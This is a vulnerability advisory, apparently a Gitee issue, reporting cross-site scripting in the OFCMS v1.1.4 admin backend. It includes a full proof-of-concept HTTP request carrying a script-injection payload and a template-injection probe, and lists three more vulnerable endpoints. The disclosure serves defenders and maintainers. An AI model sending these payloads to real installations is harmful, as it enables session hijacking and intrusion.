CVE-2022-29653: There are many cross-site scripting vulnerabilities in ofCMS system background · Issue #I53COA · 欧福/ofcms - Gitee.com

OFCMS v1.1.4 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/comn/service/update.json.


[Suggested description]
Multiple cross-site scripting vulnerabilities exist in the admin backend of OFCMS version 1.1.4 because special characters in user input are not effectively escaped.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://gitee.com/oufu/ofcms

[Affected Product Code Base]
v1.1.4

[Affected Component]

POST /ofcms/admin/comn/service/update.json?sqlid=system.role.update HTTP/1.1
Host: localhost:7000
Content-Length: 94
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:7000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:7000/ofcms/admin/f.html?p=system/role/edit.html&role_id=3&_fsUuid=820e45c9-7f52-4e8d-b917-930c4b13153c
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A81B589572EF210191B7C30F017A814D
Connection: close

role_id=3&role_name=%24%7B2*2%7D&role_desc=Test+freemarker+%3Cscript%3Ealert(1)%3C%2Fscript%3E

[Attack Type]
Remote

[Impact Code execution]
true

[Proof of Vulnerability]
Case 1:
/ofcms/admin/comn/service/update.json?sqlid=system.menu.update

Case 2:
/ofcms/admin/comn/service/update.json?sqlid=cms.bbs.update

Case 3:
/ofcms/admin/comn/service/update.json?sqlid=cms.ad.update
